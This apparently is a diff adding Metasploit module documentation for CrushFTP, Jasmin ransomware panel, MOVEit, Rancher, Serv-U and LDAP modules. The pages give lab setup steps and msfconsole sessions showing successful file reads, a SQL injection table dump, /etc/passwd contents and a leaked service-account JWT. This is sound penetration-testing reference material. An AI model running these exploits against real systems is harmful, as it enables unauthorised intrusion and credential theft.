+   Proxies                                 no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                                  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasp
+                                                     loit.html
+   RPORT       8080                        yes       The target port (TCP)
+   SSL         false                       no        Negotiate SSL/TLS for outgoing connections
+   STORE_LOOT  false                       yes       Store the target file as loot
+   TARGETFILE  users/MainUsers/groups.XML  yes       The target file to read. This can be a full path, a relative path, or a network share path (i
+                                                     f firewalls permit). Files containing binary data may not be read accurately
+   TARGETURI   /                           yes       The URI path to CrushFTP
+   VHOST                                   no        HTTP server virtual host
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > set RHOSTS 127.0.0.1
+RHOSTS => 127.0.0.1
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > check
+[+] 127.0.0.1:8080 - The target is vulnerable. Server-side template injection successful!
+msf6 auxiliary(gather/crushftp_fileread_cve_2024_4040) > run
+[*] Running module against 127.0.0.1
+
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Server-side template injection successful!
+[*] Fetching anonymous session cookie...
+[*] Using template injection to read file: users/MainUsers/groups.XML
+[+] File read succeeded! 
+<?xml version="1.0" encoding="UTF-8"?>
+<groups type="properties"></groups>
+
+
+
+[*] Auxiliary module execution completed
+```

documentation/modules/auxiliary/gather/jasmin_ransomware_dir_traversal.md

@@ -0,0 +1,139 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated directory traversal vulnerability
+within the download functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_dir_traversal`
+1. Do: `set rhosts [ip]`
+1. Do: `run`
+1. You should get the content of a file if it exists.
+
+## Options
+
+### FILE
+
+File to retrieve. `etc/passwd` is the default, but
+`var/www/html/database/db_conection.php` contains the
+database credentials.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_dir_traversal
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] root:x:0:0:root:/root:/bin/bash
+daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
+bin:x:2:2:bin:/bin:/usr/sbin/nologin
+sys:x:3:3:sys:/dev:/usr/sbin/nologin
+sync:x:4:65534:sync:/bin:/bin/sync
+games:x:5:60:games:/usr/games:/usr/sbin/nologin
+man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
+lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
+mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
+news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
+uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
+proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
+www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
+backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
+list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
+irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
+gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
+nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
+_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
+systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
+systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
+messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
+systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
+pollinate:x:105:1::/var/cache/pollinate:/bin/false
+sshd:x:106:65534::/run/sshd:/usr/sbin/nologin
+syslog:x:107:113::/home/syslog:/usr/sbin/nologin
+uuidd:x:108:114::/run/uuidd:/usr/sbin/nologin
+tcpdump:x:109:115::/nonexistent:/usr/sbin/nologin
+tss:x:110:116:TPM software stack,,,:/var/lib/tpm:/bin/false
+landscape:x:111:117::/var/lib/landscape:/usr/sbin/nologin
+fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin
+usbmux:x:113:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
+lxd:x:999:100::/var/snap/lxd/common/lxd:/bin/false
+arangodb:x:998:999:ArangoDB Application User:/usr/share/arangodb3:/bin/false
+dnsmasq:x:114:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
+postgres:x:115:121:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
+dovecot:x:116:122:Dovecot mail server,,,:/usr/lib/dovecot:/usr/sbin/nologin
+dovenull:x:117:123:Dovecot login user,,,:/nonexistent:/usr/sbin/nologin
+rtkit:x:118:124:RealtimeKit,,,:/proc:/usr/sbin/nologin
+kernoops:x:119:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
+cups-pk-helper:x:120:125:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
+systemd-oom:x:121:128:systemd Userspace OOM Killer,,,:/run/systemd:/usr/sbin/nologin
+whoopsie:x:122:129::/nonexistent:/bin/false
+geoclue:x:123:130::/var/lib/geoclue:/usr/sbin/nologin
+avahi-autoipd:x:124:131:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
+avahi:x:125:132:Avahi mDNS daemon,,,:/run/avahi-daemon:/usr/sbin/nologin
+nm-openvpn:x:126:133:NetworkManager OpenVPN,,,:/var/lib/openvpn/chroot:/usr/sbin/nologin
+saned:x:127:135::/var/lib/saned:/usr/sbin/nologin
+colord:x:129:136:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
+sssd:x:130:137:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
+pulse:x:131:138:PulseAudio daemon,,,:/run/pulse:/usr/sbin/nologin
+speech-dispatcher:x:132:29:Speech Dispatcher,,,:/run/speech-dispatcher:/bin/false
+gnome-initial-setup:x:133:65534::/run/gnome-initial-setup/:/bin/false
+gdm:x:134:140:Gnome Display Manager:/var/lib/gdm3:/bin/false
+mysql:x:136:143:MySQL Server,,,:/nonexistent:/bin/false
+
+[+] Saved file to: /root/.msf4/loot/20240415125844_default_127.0.0.1_jasmin.webpanel._670418.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > set FILE var/www/html/data
+base/db_conection.php
+FILE => var/www/html/database/db_conection.php
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) > rexploit
+[*] Reloading module...
+
+[+] <?php
+$dbcon=mysqli_connect("localhost","jasminadmin","123456");
+
+mysqli_select_db($dbcon,"jasmin_db");
+
+?>
+
+[+] Saved file to: /root/.msf4/loot/20240415125905_default_127.0.0.1_jasmin.webpanel._177654.txt
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/jasmin_ransomware_dir_traversal) >
+```
+

documentation/modules/auxiliary/gather/jasmin_ransomware_sqli.md

@@ -0,0 +1,97 @@
+## Vulnerable Application
+
+The Jasmin Ransomware web server contains an unauthenticated SQL injection vulnerability
+within the login functionality. As of April 15, 2024 this was still unpatched, so all
+versions are vulnerable. The last patch was in 2021, so it will likely not ever be patched.
+
+Retrieving the victim's data may take a long amount of time. It is much quicker to
+get the logins, then just login to the site.
+
+### Install
+
+create a LAMP server (using php 8.2 worked for me, 7.2 did not).
+Run the following commands:
+
+```
+git clone https://github.com/codesiddhant/Jasmin-Ransomware.git
+cd Jasmin-Ransomware
+sudo cp -r Web\ Panel/* /var/www/html/
+sudo chown www-data:www-data /var/www/html/*
+sudo mysql -p
+```
+
+Execute the following SQL commands:
+
+```
+CREATE DATABASE jasmin_db;
+CREATE USER 'jasminadmin'@'localhost' IDENTIFIED BY '123456';
+GRANT ALL PRIVILEGES ON jasmin_db.* TO 'jasminadmin'@'localhost';
+Exit
+```
+
+Now setup the database:
+`sudo mysql -u jasminadmin -p123456 jasmin_db < Web\ Panel/database/jasmin_db.sql`
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/jasmin_ransomware_sqli`
+1. Do: `set rhosts [IP]`
+1. Do: `run`
+1. You should contents from the SQL Database.
+
+## Options
+
+### VICTIMS
+
+Pull data from the Victim's table. Defaults to `false`
+
+### VICTIMLIMIT
+
+Number of rows from the victim table to pull. Defaults to `nil` which pulls all rows.
+
+## Scenarios
+
+### Jasmin installed on Ubuntu 22.04
+
+```
+msf6 > use auxiliary/gather/jasmin_ransomware_sqli
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set verbose true
+verbose => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set rhosts 127.0.0.1
+rhosts => 127.0.0.1
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > set victims true
+victims => true
+msf6 auxiliary(gather/jasmin_ransomware_sqli) > run
+
+[*] Dumping login table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(admin,''),ifnull(creds,'')) as binary)) from master)
+[*] {SQLi} Time-based injection: expecting output of length 15
+[+] Dumped table contents:
+Logins
+======
+
+ admin     creds
+ -----     -----
+ siddhant  123456
+
+[*] Dumping victim table
+[*] {SQLi} Executing (select group_concat(cast(concat_ws(';',ifnull(machine_name,''),ifnull(computer_user,''),ifnull(ip,''),ifnull(systemid,''),ifnull(password,'')) as binary)) from victims)
+[*] {SQLi} Time-based injection: expecting output of length 428
+[+] Dumped table contents:
+Victims
+=======
+
+ machine_name     computer_user  ip              systemid                  password
+ ------------     -------------  --              --------                  --------
+ Bollywood        Salman Khan    47.247.223.177  df545f454f5d4f5d4af5      M9M99EvNpZVOWpy9Q8sZLHEP
+ DESKTOP-37Q74QH  cyberstair     47.247.223.177  96457DF79A87C7C0008A7BE7  xAS4NinH/HQKNJwsNtTWN5yD
+ FiFa             Leone Messi    47.247.223.177  cfhsfkdjkfvdd454s5g4      JDNAaz6e3oyM8cN+AGFdMl/5
+ Indian Cricket   Virat Kohli    47.247.223.177  SDGFs4F4S4FD4F4545fs      3tIHrYJqqTSBpw4lgMMck1GD
+ White House      Donald Trump   47.247.223.177  fgighefesdgvrd5g45rd4h    RJtCd9QqiCfBaSU0zQf84dvd
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+

documentation/modules/auxiliary/gather/ldap_hashdump.md

@@ -28,20 +28,25 @@ msf5 auxiliary(gather/ldap_hashdump) > options
 
 Module options (auxiliary/gather/ldap_hashdump):
 
-   Name       Current Setting  Required  Description
-   ----       ---------------  --------  -----------
-   BASE_DN                     no        LDAP base DN if you already have it
-   BIND_DN                     no        The username to authenticate to LDAP server
-   BIND_PW                     no        Password for the BIND_DN
-   PASS_ATTR  userPassword     yes       LDAP attribute, that contains password hashes
-   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
-   RPORT      1389             yes       The target port
-   SSL        false            no        Enable SSL on the LDAP connection
-   USER_ATTR  dn               no        LDAP attribute, that contains username
-
-
-Auxiliary action:
+   Name          Current Setting                                        Required  Description
+   ----          ---------------                                        --------  -----------
+   BASE_DN                                                              no        LDAP base DN if you already have it]
+   DOMAIN                                                               no        The domain to authenticate to
+   MAX_LOOT                                                             no        Maximum number of LDAP entries to loot
+   PASSWORD                                                             no        The password to authenticate with
+   PASS_ATTR     userPassword, sambantpassword, sambalmpassword, mailu  yes       LDAP attribute, that contains password hashes
+                 serpassword, password, pwdhistory, passwordhistory, c
+                 learpassword
+   READ_TIMEOUT  600                                                    no        LDAP read timeout in seconds
+   RHOSTS        127.0.0.1                                              yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.h
+                                                                                  tml
+   RPORT         1389                                                   yes       The target port
+   SSL           true                                                   no        Enable SSL on the LDAP connection
+   THREADS       1                                                      yes       The number of concurrent threads (max one per host)
+   USERNAME                                                             no        The username to authenticate with
+   USER_ATTR     dn                                                     no        LDAP attribute(s), that contains username
 
+                                                                                                                                                                                           Auxiliary action:
    Name  Description
    ----  -----------
    Dump  Dump all LDAP data

documentation/modules/auxiliary/gather/ldap_query.md

@@ -214,23 +214,33 @@ QUERY_FILE_PATH => /home/gwillcox/git/metasploit-framework/test.yaml
 msf6 auxiliary(gather/ldap_query) > show options
 
 Module options (auxiliary/gather/ldap_query):
-
-   Name             Current Setting                     Required  Description
-   ----             ---------------                     --------  -----------
-   BASE_DN                                              no        LDAP base DN if you already have it
-   BIND_DN          normal@daforest.com                 no        The username to authenticate to LDAP server
-   BIND_PW          thePassword123                      no        Password for the BIND_DN
-   OUTPUT_FORMAT    table                               yes       The output format to use (Accepted: csv, table, json)
-   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-fram  no        Path to the JSON or YAML file to load and run queries from
-                    ework/test.yaml
-   RHOSTS           172.27.51.83                        yes       The target host(s), see https://github.com/rapid7/metasploit-f
-                                                                  ramework/wiki/Using-Metasploit
-   RPORT            389                                 yes       The target port
-   SSL              false                               no        Enable SSL on the LDAP connection
+                                                                                                                                                                                              Name             Current Setting      Required  Description
+   ----           ---------------      --------  -----------
+   BASE_DN                             no        LDAP base DN if you already have it
+   DOMAIN                              no        The domain to authenticate to
+   OUTPUT_FORMAT  table                yes       The output format to use (Accepted: csv, table, json)
+   PASSWORD       thePassword123       no        The password to authenticate with
+   RHOSTS         172.27.51.83         yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT          389                  yes       The target port
+   SSL            false                no        Enable SSL on the LDAP connection
+   USERNAME       normal@daforest.com  no        The username to authenticate with
 
 
-Auxiliary action:
+   When ACTION is RUN_QUERY_FILE:
 
+   Name             Current Setting                                    Required  Description
+   ----             ---------------                                    --------  -----------
+   QUERY_FILE_PATH  /home/gwillcox/git/metasploit-framework/test.yaml  no        Path to the JSON or YAML file to load and run queries from
+
+
+   When ACTION is RUN_SINGLE_QUERY:
+
+   Name              Current Setting  Required  Description
+   ----              ---------------  --------  -----------
+   QUERY_ATTRIBUTES                   no        Comma separated list of attributes to retrieve from the server
+   QUERY_FILTER                       no        Filter to send to the target LDAP server to perform the query
+
+                                                                                                                                                                                           Auxiliary action:
    Name            Description
    ----            -----------
    RUN_QUERY_FILE  Execute a custom set of LDAP queries from the JSON or YAML file specified by QUERY_FILE.

documentation/modules/auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806.md

@@ -0,0 +1,96 @@
+## Vulnerable Application
+This module exploits CVE-2024-5806, an authentication bypass vulnerability in the MOVEit Transfer SFTP service. The
+following version are affected:
+
+* MOVEit Transfer 2023.0.x (Fixed in 2023.0.11)
+* MOVEit Transfer 2023.1.x (Fixed in 2023.1.6)
+* MOVEit Transfer 2024.0.x (Fixed in 2024.0.2)
+
+The module can establish an authenticated SFTP session for a MOVEit Transfer user. The module allows for both listing
+the contents of a directory, and the reading of an arbitrary file.
+
+Read our AttackerKB [Rapid7 Analysis](https://attackerkb.com/topics/44EZLG2xgL/cve-2024-5806/rapid7-analysis)
+for a full technical description of both the vulnerability and exploitation.
+
+## Testing
+1. Installation requires a valid trial license that can be obtained by going here:
+   https://www.ipswitch.com/forms/free-trials/moveit-transfer
+2. Ensure that your computer has internet access for the license to activate and double-click the installer.
+3. Follow installation instructions for an evaluation installation.
+4. After the installation completes, follow the instructions to create an sysadmin user.
+5. Log in as the sysadmin and create a new Organization (e.g. `TestOrg`).
+6. In the `Home` section, click the "Act as administrator in the TestOrg organization" button.
+7. In the `Users` section, create a new normal user (e.g. `testuser1`) in the new Organization.
+8. In the `Folders` section, navigate to the `testuser1` Home folder and create some files and folders.
+9. The SFTP service will be running by default. No further configuration is required.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set STORE_LOOT false`
+5. `set TARGETUSER <TARGET_USERNAME>` (Must be a valid username on the target server, for example `testuser1`)
+6. `set TARGETFILE /`
+7. `check`
+8. `run`
+
+## Options
+
+### STORE_LOOT
+Whether the read file's contents should be stored as loot in the Metasploit database. If set to false, the files
+content will be displayed in the console. (default: true).
+
+### TARGETUSER
+A valid username to authenticate as. (default: nil).
+
+### TARGETFILE
+The full path of a target file or directory to read. If a directory path is specified, the output will be the
+directories contents. If a file path is specified, the output will be the files contents. In order to learn
+what files you can read, you can first read the root directories (/) contents. (default: /).
+
+## Scenarios
+
+### Default
+
+```
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set RHOST 169.254.180.121
+RHOST => 169.254.180.121
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set STORE_LOOT false
+STORE_LOOT => false
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > set TARGETUSER testuser1
+TARGETUSER => testuser1
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > show options
+
+Module options (auxiliary/gather/progress_moveit_sftp_fileread_cve_2024_5806):
+
+   Name        Current Setting  Required  Description
+   ----        ---------------  --------  -----------
+   RHOSTS      169.254.180.121  yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+   RPORT       22               yes       The target port
+   STORE_LOOT  false            no        Store the target file as loot
+   TARGETFILE  /                yes       The full path of a target file or directory to read.
+   TARGETUSER  testuser1        yes       A valid username to authenticate as.
+
+
+View the full module info with the info, or info -d command.
+
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > run
+[*] Running module against 169.254.180.121
+
+[*] Authenticating as: testuser1@169.254.180.121:22
+[*] Listing directory: /
+dr-xr-xr-x 1 0 0 0 Jun 23 16:19 /Home/
+dr-xr-xr-x 1 0 0 0 Jun 18 22:50 /Home/testuser1/
+dr-xr-xr-x 1 0 0 0 Jun 18 22:50 /Home/testuser1/TestFolder1/
+-rw-rw-rw- 1 0 0 8 Jun 18 22:50 /Home/testuser1/test.txt
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > run TARGETFILE=/Home/testuser1/test.txt
+[*] Running module against 169.254.180.121
+
+[*] Authenticating as: testuser1@169.254.180.121:22
+[*] Downloading file: /Home/testuser1/test.txt
+secrets!
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/progress_moveit_sftp_fileread_cve_2024_5806) > 
+```

documentation/modules/auxiliary/gather/rancher_authenticated_api_cred_exposure.md

@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+An issue was discovered in Rancher versions up to and including
+2.5.15 and 2.6.6 where sensitive fields, like passwords, API keys
+and Ranchers service account token (used to provision clusters),
+were stored in plaintext directly on Kubernetes objects like Clusters,
+for example cluster.management.cattle.io. Anyone with read access to
+those objects in the Kubernetes API could retrieve the plaintext
+version of those sensitive data.
+
+### Install
+
+* Clone the repository from: https://github.com/fe-ax/tf-cve-2021-36782
+* Create a Digital Ocean API Token
+    * Log into Digital Ocean and navigate to: API > Tokens
+    * Select "Generate New Token"
+    * Enter a token name and then select either Full Access or Custom Scopes
+        * If selecting Custom Scopes, use the values provided below
+* Back in the `tf-cve-2021-36782`, copy the `example.tfvars` file to `yourown.tfvars`
+* Edit `yourown.tfvars` and add the newly generated DO API token as `do_token`
+    * Optionally set the region for the clusters to one closer to you (e.g. `nyc3`)
+* Run `terraform init`
+* Run `terraform apply -var-file yourown.tfvars`, this can take about 20 minutes to run
+* Take the hostname from the `rancher_admin_url` output from terraform and use that as the `RHOST` value for the module
+* Take the password from the `rancher_password` file and use that with the username "admin" for the module
+
+#### Digital Ocean API Token Custom Scopes
+It's possible that there are unnecessary privileges contained within the following settings, however it does permit the
+test environment to start without a full access token.
+
+* Fully Scoped Access:
+    * 1click (2): create, read
+    * account (1): read
+    * actions (1): read
+    * billing (1): read
+    * kubernetes (5): create, read, update, delete, access_cluster
+    * load_balancer (4): create, read, update, delete
+    * monitoring (4): create, read, update, delete
+    * project (4): create, read, update, delete
+    * regions (1): read
+    * registry (4): create, read, update, delete
+    * sizes (1): read
+* Create Access:
+    * app / droplet / firewall / ssh_key
+* Read Access:
+    * app / block_storage / block_storage_action / block_storage_snapshot / cdn / certificate / database / domain / droplet / firewall / function / image / reserved_ip / snapshot / ssh_key / tag / uptime / vpc
+* Update Access:
+    * ssh_key
+
+## Verification Steps
+
+1. Install the application
+1. Start msfconsole
+1. Do: `use auxiliary/gather/rancher_authenticated_api_cred_exposure`
+1. Do: `set rhosts [ip]`
+1. Do: `set username [username]`
+1. Do: `set password [password]`
+1. Do: `run`
+1. If any API items of value are found, they will be printed
+
+## Options
+
+### Username
+
+Username for Rancher. user must be in one or more of the following groups:
+
+* `Cluster Owners`
+* `Cluster Members`
+* `Project Owners`
+* `Project Members`
+* `User Base`
+
+### Password
+
+Password for Rancher.
+
+## Scenarios
+
+### Docker Image
+
+```
+msf6 > use auxiliary/gather/rancher_authenticated_api_cred_exposure 
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set rhosts rancher.178.62.209.204.sslip.io
+rhosts => rancher.178.62.209.204.sslip.io
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set username readonlyuser
+username => readonlyuser
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set password readonlyuserreadonlyuser
+password => readonlyuserreadonlyuser
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > set verbose true
+verbose => true
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > run
+[*] Running module against 178.62.209.204
+
+[*] Attempting login
+[-] Auxiliary aborted due to failure: unreachable: 178.62.209.204:443 - Could not connect to web service - no response
+[*] Auxiliary module execution completed
+msf6 auxiliary(gather/rancher_authenticated_api_cred_exposure) > run
+[*] Running module against 178.62.209.204
+
+[*] Attempting login
+[+] login successful, querying APIs
+[*] Querying /v1/management.cattle.io.catalogs
+[*] Querying /v1/management.cattle.io.clusters
+[+] Found leaked key Cluster.Status.ServiceAccountToken: eyJhbGciOiJSUzI1NiIsImtpZCI6IndsUHhqR1pxX1dSbkFwVG92SFZ1RWV5WDNjbktDTmhZRVUtOFhWY2gyQ0kifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4taG52eG4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjgyOWZiN2FiLTA0NzItNDA1ZC1iOWI4LTRmNjhjYmZhNDAyMyIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.URiTKnslommru1NDTq-ClcSc9DBsQwr4_eqSCfksoIeGACwYKK3kPCxe0aVixOkWK9saFTcR46bEz7Of4BfMjUShBl89zSmaGHmlNvYd2sLssWMXbcQInC4Y7Ckti49VbBFoU5EWe-LBSiNrhZcNL6NTn00PgMlIT7OFiSugg8ar7k6Q1Suak0pW_ea1Z56bHGWD-WJM8GsYxohXX7HwYh8cyfOSd_jH6HTZ-p6qsZcWAHnREuzNwcdXqycDVxTA48XEZlfLOJDgvbyhNPssedf3os1rcWTQ5vh_NzUjyqpb8PzQOWm427XjMzBQxwSJVyu1a2TYlNXsLX9qCARjng
+[*] Querying /v1/management.cattle.io.clustertemplates
+[*] Querying /v1/management.cattle.io.notifiers
+[*] Querying /v1/project.cattle.io.sourcecodeproviderconfig
+[-] No response received from /v1/project.cattle.io.sourcecodeproviderconfig
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/catalogs
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clusters
+[-] No response received from /k8s/clusters/local/apis/management.cattle.io/v3/clusters
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/clustertemplates
+[*] Querying /k8s/clusters/local/apis/management.cattle.io/v3/notifiers
+[*] Querying /k8s/clusters/local/apis/project.cattle.io/v3/sourcecodeproviderconfigs
+[*] Auxiliary module execution completed
+```
+
+The [Cluster.Status.ServiceAccountToken](https://jwt.io/#debugger-io?token=eyJhbGciOiJSUzI1NiIsImtpZCI6IndsUHhqR1pxX1dSbkFwVG92SFZ1RWV5WDNjbktDTmhZRVUtOFhWY2gyQ0kifQ.eyJpc3MiOiJrdWJlcm5ldGVzL3NlcnZpY2VhY2NvdW50Iiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9uYW1lc3BhY2UiOiJjYXR0bGUtc3lzdGVtIiwia3ViZXJuZXRlcy5pby9zZXJ2aWNlYWNjb3VudC9zZWNyZXQubmFtZSI6ImtvbnRhaW5lci1lbmdpbmUtdG9rZW4taG52eG4iLCJrdWJlcm5ldGVzLmlvL3NlcnZpY2VhY2NvdW50L3NlcnZpY2UtYWNjb3VudC5uYW1lIjoia29udGFpbmVyLWVuZ2luZSIsImt1YmVybmV0ZXMuaW8vc2VydmljZWFjY291bnQvc2VydmljZS1hY2NvdW50LnVpZCI6IjgyOWZiN2FiLTA0NzItNDA1ZC1iOWI4LTRmNjhjYmZhNDAyMyIsInN1YiI6InN5c3RlbTpzZXJ2aWNlYWNjb3VudDpjYXR0bGUtc3lzdGVtOmtvbnRhaW5lci1lbmdpbmUifQ.URiTKnslommru1NDTq-ClcSc9DBsQwr4_eqSCfksoIeGACwYKK3kPCxe0aVixOkWK9saFTcR46bEz7Of4BfMjUShBl89zSmaGHmlNvYd2sLssWMXbcQInC4Y7Ckti49VbBFoU5EWe-LBSiNrhZcNL6NTn00PgMlIT7OFiSugg8ar7k6Q1Suak0pW_ea1Z56bHGWD-WJM8GsYxohXX7HwYh8cyfOSd_jH6HTZ-p6qsZcWAHnREuzNwcdXqycDVxTA48XEZlfLOJDgvbyhNPssedf3os1rcWTQ5vh_NzUjyqpb8PzQOWm427XjMzBQxwSJVyu1a2TYlNXsLX9qCARjng) is actually a JWT token as seen in the link.

documentation/modules/auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995.md

@@ -0,0 +1,201 @@
+## Vulnerable Application
+This module exploits an unauthenticated file read vulnerability, due to directory traversal, affecting
+SolarWinds Serv-U FTP Server 15.4, Serv-U Gateway 15.4, and Serv-U MFT Server 15.4. All versions prior to
+the vendor supplied hotfix "15.4.2 Hotfix 2" (version 15.4.2.157) are affected.
+
+For a technical analysis of the vulnerability, read our [Rapid7 Analysis](https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis).
+
+## Testing
+Follow the below instruction for either Linux or Windows.
+* Download a vulnerable version of SolarWinds Serv-U MFT Server, for example version `15.4.2.126`.
+* Install the Serv-U Server by running the installer binary and accepting the defaults for every setting.
+* Log into the Serv-U Server Management Console, and create a new Serv-U Domain. Follow the instruction and
+accept the default values during setup. The newly created domain will expose a HTTP and HTTPS service bound to all
+interfaces. These are the `RHOST`, `RPORT`, and `SSL` options we set in the auxiliary module.
+
+To read a file we set the `TARGETFILE` option to the absolute path of the file we want to read. For example on Linux
+we can set the target file to `/etc/passwd`, or on Windows to `C:\\Windows\win.ini`.
+
+Note: When using `msfconsole` you will need to escape a backslash (`\ `) with a double backslash (`\\`).
+
+On Windows, by default, the install directory is `C:\ProgramData\RhinoSoft\Serv-U\ ` and the `Serv-U.exe` service runs
+as the `NT AUTHORITY\NETWORK SERVICE` user.
+
+On Linux, by default, the install directory is `/usr/local/Serv-U/` and the `Serv-U` service runs as `root`.
+The file `/usr/local/Serv-U/Shares/Serv-U.FileShares` is a SQLite database containing the absolute path of all files
+shared by Serv-U, and can be downloaded and used for target file discovery. This database file is not accessible on a
+Windows target, as it is locked by the `Serv-U.exe` process and cannot be opened a second time.
+
+## Verification Steps
+
+1. Start msfconsole
+2. `use auxiliary/gather/solarwinds_servu_fileread_cve_2024_28995`
+3. `set RHOST <TARGET_IP_ADDRESS>`
+4. `set STORE_LOOT false`
+5. `set TARGETFILE /etc/passwd`
+6. `check`
+7. `run`
+
+## Options
+
+### STORE_LOOT
